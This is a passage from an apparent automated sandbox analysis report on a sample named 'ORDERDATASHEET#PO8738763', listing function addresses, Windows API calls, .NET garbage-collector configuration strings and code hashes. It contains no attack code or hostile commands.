Opcode Fuzzy Hash: 5188d5bc0a99c14dc0d2229a5aba8e7e5169a6da6aec5c86698c49050b78a37c
Instruction Fuzzy Hash: 07F0AF71B1C69182EB289F0AF404219E760BB5EBD4F484138EF8C17B6CDB3DC6818B04

Function 00007FF7BD602DD0 Relevance: 2.5, APIs: 2, Instructions: 17
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FF7BD602DE6
VirtualFree.KERNELBASE ref: 00007FF7BD602DFC

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 3b0924aad5c9d8f1e4054d63f84a8e7ac6c370ab154e50dab9d8d9c549d06468
Instruction ID: 0a55cd9b2cac07308f790a5f8a519d87e1f968b61e591681c49938a26900dd1d
Opcode Fuzzy Hash: 3b0924aad5c9d8f1e4054d63f84a8e7ac6c370ab154e50dab9d8d9c549d06468
Instruction Fuzzy Hash: 88E0CD24F1D10181EB1CBB17784565452917F6EB00FC08034C60D03354FF2D51578F60

Function 00007FF7BD69CFB0 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF7BD69CE70,?,?,00000030), ref: 00007FF7BD69D029

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ce31ffd1ec9d8b5bbdb0ed3b55378968654e8df619020ba143fb855d25076bc4
Instruction ID: 1449ed7260a6d729d332f06d517f48622401599228059c90392c04caea046817
Opcode Fuzzy Hash: ce31ffd1ec9d8b5bbdb0ed3b55378968654e8df619020ba143fb855d25076bc4
Instruction Fuzzy Hash: C631B822E0C61645F718BB19D8416FDA2526F6A798F840071DF1D5B78EFE2CA885C750

Function 00007FF7BD5F2AB0 Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7BD5FCE60: GetCurrentThreadId.KERNEL32 ref: 00007FF7BD5FCE64

Part of subcall function 00007FF7BD5FE660: VirtualQuery.KERNEL32 ref: 00007FF7BD5FE692

RaiseFailFastException.KERNEL32 ref: 00007FF7BD5F2B36

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
String ID:
API String ID: 2131581837-0
Opcode ID: 81512a36198997ebbb2f8b2451833254b7240adeb84ca046804f6c980f224bd1
Instruction ID: 814eb174c913979ef56ad26d4e3ba49b4ebf0c819e28ea227e6c1fd1f372a8ed
Opcode Fuzzy Hash: 81512a36198997ebbb2f8b2451833254b7240adeb84ca046804f6c980f224bd1
Instruction Fuzzy Hash: 71118F7290C78582D628AF29B4011AAB311FB467B4F944335EBBD4B7CAEF38D0428700

Function 00007FF7BD602EA0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 00007FF7BD602EAA

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c77d0b216ed602b1f63c297f10537e1da20961e91553004aa9498b52e676b055
Instruction ID: 7f2983b2c8fdb7ed97fcd57a130cf568ec046bcf82c89fe13be5b09b3348559d
Opcode Fuzzy Hash: c77d0b216ed602b1f63c297f10537e1da20961e91553004aa9498b52e676b055
Instruction Fuzzy Hash: ADB01200F2E001C2E31C3B237C86B0C02142B1EB12FC40064C70CA1250DE2D81E51B20

Non-executed Functions

Function 00007FF7BD603130 Relevance: 123.1, Strings: 98, Instructions: 569COMMON

Download Yara Rule

Strings

BGCFLEnableTBH, xrefs: 00007FF7BD6038B1
Gen0Size, xrefs: 00007FF7BD6033D0
GCSpinCountUnit, xrefs: 00007FF7BD603ACF
System.GC.LargePages, xrefs: 00007FF7BD6032D8
BGCMLki, xrefs: 00007FF7BD603839
System.GC.MaxHeapCount, xrefs: 00007FF7BD6033AE
System.GC.CpuGroup, xrefs: 00007FF7BD6032A8
System.GC.HeapHardLimitSOH, xrefs: 00007FF7BD60390B
System.GC.HighMemoryPercent, xrefs: 00007FF7BD6034F3
BGCFLTuningEnabled, xrefs: 00007FF7BD6036D1
RetainVM, xrefs: 00007FF7BD6031EC
NoAffinitize, xrefs: 00007FF7BD603232
GCLowSkipRatio, xrefs: 00007FF7BD60356F
LOHCompactionMode, xrefs: 00007FF7BD603310, 00007FF7BD603350
ConfigLogFile, xrefs: 00007FF7BD6036A3
CompactRatio, xrefs: 00007FF7BD603466
System.GC.Concurrent, xrefs: 00007FF7BD603173
GCGen0MaxBudget, xrefs: 00007FF7BD603533
System.GC.HeapAffinitizeMask, xrefs: 00007FF7BD603484
LatencyMode, xrefs: 00007FF7BD60340C
System.GC.LOHThreshold, xrefs: 00007FF7BD60332E
GCRegionSize, xrefs: 00007FF7BD60360D
LogFileSize, xrefs: 00007FF7BD603448
LOHThreshold, xrefs: 00007FF7BD60333D
BGCFLkp, xrefs: 00007FF7BD603767
GCDTargetTCP, xrefs: 00007FF7BD603B1E
GCHighMemPercent, xrefs: 00007FF7BD603502
LatencyLevel, xrefs: 00007FF7BD60342A
GCProvModeStress, xrefs: 00007FF7BD603515
HeapVerifyLevel, xrefs: 00007FF7BD6032F2
GCHeapHardLimitPercent, xrefs: 00007FF7BD6035BE
GCPath, xrefs: 00007FF7BD603A8C, 00007FF7BD603AAF
GCRegionRange, xrefs: 00007FF7BD6035EF
BreakOnOOM, xrefs: 00007FF7BD6031FF
BGCFLSweepGoal, xrefs: 00007FF7BD60372B
BGCFLff, xrefs: 00007FF7BD6037C1
ServerGC, xrefs: 00007FF7BD60315A
GCTotalPhysicalMemory, xrefs: 00007FF7BD6035D1
BGCFLEnableKi, xrefs: 00007FF7BD603857
GCHeapHardLimitSOH, xrefs: 00007FF7BD60391A
BGCFLEnableFF, xrefs: 00007FF7BD6038CF, 00007FF7BD603A17
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF7BD603971
BGCFLki, xrefs: 00007FF7BD603785
BGCMemGoal, xrefs: 00007FF7BD6036EF
System.GC.DynamicAdaptationMode, xrefs: 00007FF7BD603AED
System.GC.DTargetTCP, xrefs: 00007FF7BD603B0F
System.GC.RetainVM, xrefs: 00007FF7BD6031DA
System.GC.HeapHardLimit, xrefs: 00007FF7BD60358D
BGCFLEnableKd, xrefs: 00007FF7BD603875
GCNumaAware, xrefs: 00007FF7BD603287
BGCFLEnableSmooth, xrefs: 00007FF7BD603893
GCLargePages, xrefs: 00007FF7BD6032E2
GCName, xrefs: 00007FF7BD603A3F, 00007FF7BD603A62
GCEnabledInstructionSets, xrefs: 00007FF7BD6039D7
GCHeapHardLimitPOH, xrefs: 00007FF7BD60395E
System.GC.HeapHardLimitPercent, xrefs: 00007FF7BD6035AF
GCHeapHardLimitLOHPercent, xrefs: 00007FF7BD6039A5
LogFile, xrefs: 00007FF7BD60365F
BGCSpin, xrefs: 00007FF7BD60336E
LogEnabled, xrefs: 00007FF7BD603245
GCDynamicAdaptationMode, xrefs: 00007FF7BD603AFC
ConfigLogEnabled, xrefs: 00007FF7BD603266
BGCMLkp, xrefs: 00007FF7BD603826
ForceCompact, xrefs: 00007FF7BD6031B9
System.GC.HeapHardLimitPOH, xrefs: 00007FF7BD60394F
System.GC.HeapHardLimitLOH, xrefs: 00007FF7BD60392D
System.GC.HeapAffinitizeRanges, xrefs: 00007FF7BD6034A6, 00007FF7BD6034C7
BGCMemGoalSlack, xrefs: 00007FF7BD60370D
MaxHeapCount, xrefs: 00007FF7BD6033BD
BGCFLSmoothFactor, xrefs: 00007FF7BD6037DF
GCLogFile, xrefs: 00007FF7BD60364E
System.GC.Server, xrefs: 00007FF7BD60314B
System.GC.HeapCount, xrefs: 00007FF7BD60338C
ConcurrentGC, xrefs: 00007FF7BD603185
GCConfigLogFile, xrefs: 00007FF7BD603692
System.GC.Path, xrefs: 00007FF7BD603A85, 00007FF7BD603A9D
GCConserveMem, xrefs: 00007FF7BD603A04
BGCFLGradualD, xrefs: 00007FF7BD6037FD
System.GC.ConserveMemory, xrefs: 00007FF7BD6039F5
BGCG2RatioStep, xrefs: 00007FF7BD6038ED
GCHeapHardLimit, xrefs: 00007FF7BD60359C
GCHeapHardLimitLOH, xrefs: 00007FF7BD60393C
GCHeapHardLimitSOHPercent, xrefs: 00007FF7BD603980
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF7BD6039B5
GCHeapAffinitizeRanges, xrefs: 00007FF7BD6034B2, 00007FF7BD6034D3
SegmentSize, xrefs: 00007FF7BD6033EE
ConservativeGC, xrefs: 00007FF7BD603198
BGCFLkd, xrefs: 00007FF7BD6037A3
GCGen1MaxBudget, xrefs: 00007FF7BD603551
GCCpuGroup, xrefs: 00007FF7BD6032BA
System.GC.NoAffinitize, xrefs: 00007FF7BD603220
BGCFLSweepGoalLOH, xrefs: 00007FF7BD603749
GCHeapAffinitizeMask, xrefs: 00007FF7BD603493
GCEnableSpecialRegions, xrefs: 00007FF7BD60362B
HeapCount, xrefs: 00007FF7BD60339B
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF7BD60399B
GCHeapHardLimitPOHPercent, xrefs: 00007FF7BD6039C4
System.GC.Name, xrefs: 00007FF7BD603A38, 00007FF7BD603A50

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCPath$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.Path$System.GC.RetainVM$System.GC.Server
API String ID: 0-1379766591
Opcode ID: d99b99d8d7d8079bc8fcfdef839217da97d7cae1de85db9ed7a85a6efaf86363
Instruction ID: c482d5b5c2040c1919c82656d785346c18ead55c3fa7aa1b86a0c9ffb0c9a8b5
Opcode Fuzzy Hash: d99b99d8d7d8079bc8fcfdef839217da97d7cae1de85db9ed7a85a6efaf86363
Instruction Fuzzy Hash: DE42A571A0CA5641EB25BB19F850AA9A3A1FF667D6FC11132DA4C07F28EF7CD121C750

Function 00007FF7BD603EF0 Relevance: 113.0, Strings: 90, Instructions: 479COMMON

Download Yara Rule

Strings

BGCFLEnableTBH, xrefs: 00007FF7BD6047A6
GCEnabledInstructionSets, xrefs: 00007FF7BD604935
GCSpinCountUnit, xrefs: 00007FF7BD6049B5
GCHeapHardLimitPOH, xrefs: 00007FF7BD60488B
System.GC.HeapHardLimitPercent, xrefs: 00007FF7BD604444
GCMaxHeapCount, xrefs: 00007FF7BD6041F9
GCHeapHardLimitLOHPercent, xrefs: 00007FF7BD6048E0
GCDynamicAdaptationMode, xrefs: 00007FF7BD6049E5
BGCSpin, xrefs: 00007FF7BD60419B
gcConservative, xrefs: 00007FF7BD603F4F
GCgen0size, xrefs: 00007FF7BD604220
System.GC.LargePages, xrefs: 00007FF7BD6040C6
BGCMLki, xrefs: 00007FF7BD604702
BGCMLkp, xrefs: 00007FF7BD6046D9
System.GC.MaxHeapCount, xrefs: 00007FF7BD6041F2
System.GC.CpuGroup, xrefs: 00007FF7BD604099
System.GC.HeapHardLimitPOH, xrefs: 00007FF7BD604884
System.GC.HeapHardLimitSOH, xrefs: 00007FF7BD604821
System.GC.HeapHardLimitLOH, xrefs: 00007FF7BD60484F
GCSegmentSize, xrefs: 00007FF7BD604249
System.GC.HighMemoryPercent, xrefs: 00007FF7BD604344
BGCFLTuningEnabled, xrefs: 00007FF7BD604516
HeapVerify, xrefs: 00007FF7BD6040F3
GCLowSkipRatio, xrefs: 00007FF7BD6043ED
BGCMemGoalSlack, xrefs: 00007FF7BD604568
BGCFLSmoothFactor, xrefs: 00007FF7BD604690
GCCompactRatio, xrefs: 00007FF7BD6042ED
GCBreakOnOOM, xrefs: 00007FF7BD603FCC
System.GC.Server, xrefs: 00007FF7BD603EFB
System.GC.HeapCount, xrefs: 00007FF7BD6041C4
gcForceCompact, xrefs: 00007FF7BD603F77
System.GC.Concurrent, xrefs: 00007FF7BD603F22
GCConserveMemory, xrefs: 00007FF7BD604965
GCGen0MaxBudget, xrefs: 00007FF7BD60439B
System.GC.HeapAffinitizeMask, xrefs: 00007FF7BD604316
GCWriteBarrier, xrefs: 00007FF7BD60498C
System.GC.LOHThreshold, xrefs: 00007FF7BD604144
GCRegionSize, xrefs: 00007FF7BD6044CD
GCLOHThreshold, xrefs: 00007FF7BD60414B
BGCFLkp, xrefs: 00007FF7BD6045E3
GCDTargetTCP, xrefs: 00007FF7BD604A13
GCHighMemPercent, xrefs: 00007FF7BD60434B
gcServer, xrefs: 00007FF7BD603F02
GCProvModeStress, xrefs: 00007FF7BD604372
GCLogEnabled, xrefs: 00007FF7BD604021
GCHeapHardLimitPercent, xrefs: 00007FF7BD60444B
GCLatencyLevel, xrefs: 00007FF7BD60429B
GCRegionRange, xrefs: 00007FF7BD60449B
BGCFLGradualD, xrefs: 00007FF7BD6046B0
GCHeapCount, xrefs: 00007FF7BD6041CB
System.GC.ConserveMemory, xrefs: 00007FF7BD60495E
BGCG2RatioStep, xrefs: 00007FF7BD6047F8
GCHeapHardLimit, xrefs: 00007FF7BD60441D
GCHeapHardLimitLOH, xrefs: 00007FF7BD604856
GCRetainVM, xrefs: 00007FF7BD603FA6
GCHeapHardLimitSOHPercent, xrefs: 00007FF7BD6048B2
BGCFLSweepGoal, xrefs: 00007FF7BD604591
BGCFLff, xrefs: 00007FF7BD60465E
GCTotalPhysicalMemory, xrefs: 00007FF7BD604472
BGCFLEnableKi, xrefs: 00007FF7BD60472B
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF7BD604907
GCHeapHardLimitSOH, xrefs: 00007FF7BD604828
BGCFLEnableFF, xrefs: 00007FF7BD6047CF
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF7BD6048AB
BGCFLki, xrefs: 00007FF7BD60460C
BGCFLkd, xrefs: 00007FF7BD604635
GCLOHCompact, xrefs: 00007FF7BD60411B
BGCSpinCount, xrefs: 00007FF7BD604172
GCNoAffinitize, xrefs: 00007FF7BD603FFB
GCGen1MaxBudget, xrefs: 00007FF7BD6043C4
BGCMemGoal, xrefs: 00007FF7BD60453F
System.GC.DynamicAdaptationMode, xrefs: 00007FF7BD6049DE
System.GC.DTargetTCP, xrefs: 00007FF7BD604A0C
GCCpuGroup, xrefs: 00007FF7BD6040A0
System.GC.NoAffinitize, xrefs: 00007FF7BD603FF4
BGCFLSweepGoalLOH, xrefs: 00007FF7BD6045BA
System.GC.RetainVM, xrefs: 00007FF7BD603F9F
System.GC.HeapHardLimit, xrefs: 00007FF7BD604416
GCLatencyMode, xrefs: 00007FF7BD604272
GCHeapAffinitizeMask, xrefs: 00007FF7BD60431D
GCConfigLogEnabled, xrefs: 00007FF7BD604049
GCLogFileSize, xrefs: 00007FF7BD6042CD
GCEnableSpecialRegions, xrefs: 00007FF7BD6044ED
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF7BD6048D9
GCHeapHardLimitPOHPercent, xrefs: 00007FF7BD60490E
BGCFLEnableKd, xrefs: 00007FF7BD604754
GCNumaAware, xrefs: 00007FF7BD604071
BGCFLEnableSmooth, xrefs: 00007FF7BD60477D
gcConcurrent, xrefs: 00007FF7BD603F29
GCLargePages, xrefs: 00007FF7BD6040CD

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: strcmp
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 1004003707-1492036319
Opcode ID: 4191eb02c31c6530e6ec1d622d11567a61af9ffd1ff6ecc5b188b8cc01225dc0
Instruction ID: 4a77139e3a2904531fe8f4bc3f1760ba5cbedc83e79ea1601e2ace52766c15a6
Opcode Fuzzy Hash: 4191eb02c31c6530e6ec1d622d11567a61af9ffd1ff6ecc5b188b8cc01225dc0
Instruction Fuzzy Hash: DE62AC60D0DA8790EA09FB5DA8501A1A7A1EF77762FC44132E64C4736DFEACA175C3B0

Function 00007FF7BD602F60 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7BD602F9C
GetCurrentProcess.KERNEL32 ref: 00007FF7BD602FC4
OpenProcessToken.ADVAPI32 ref: 00007FF7BD602FD7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7BD602FFC
GetLastError.KERNEL32 ref: 00007FF7BD603004
CloseHandle.KERNEL32 ref: 00007FF7BD603011
GetLargePageMinimum.KERNEL32 ref: 00007FF7BD603026
VirtualAlloc.KERNEL32 ref: 00007FF7BD603057
GetCurrentProcess.KERNEL32 ref: 00007FF7BD603063
VirtualAllocExNuma.KERNEL32 ref: 00007FF7BD603083

Strings

SeLockMemoryPrivilege, xrefs: 00007FF7BD602F95

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648246573.00007FF7BD788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD831000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD838000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648293949.00007FF7BD83D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1648331294.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bd5f0000_ORDERDATASHEET#PO8738763.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: 15b15ab6d6ee02b3c5b0b81b0fa05c43a8a43f1a4b1e1b9cf4b9317159724ae4
Instruction ID: 2237e03ba8106aaa7718f731c1e9262ed9851ff9c6deff4544309f56acf85e0f
Opcode Fuzzy Hash: 15b15ab6d6ee02b3c5b0b81b0fa05c43a8a43f1a4b1e1b9cf4b9317159724ae4
Instruction Fuzzy Hash: CD31C721A1DA4285F728AB66F4483BAA7A1EFAA7D9F804034DB4E07759EF7DD0448710

Function 00007FF7BD5F6ED0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7BD5F7871), ref: 00007FF7BD5F6F88
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7BD5F7871), ref: 00007FF7BD5F70DB
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7BD5F7871), ref: 00007FF7BD5F71B3
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7BD5F7871), ref: 00007FF7BD5F71C9
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF7BD5F7871), ref: 00007FF7BD5F7245

Strings

[ KeepUnwinding ], xrefs: 00007FF7BD5F71E4

Memory Dump Source

Source File: 00000000.00000002.1648140058.00007FF7BD5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BD5F0000, based on PE: true

Associated: 00000000.00000002.1648127835.00007FF7BD5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
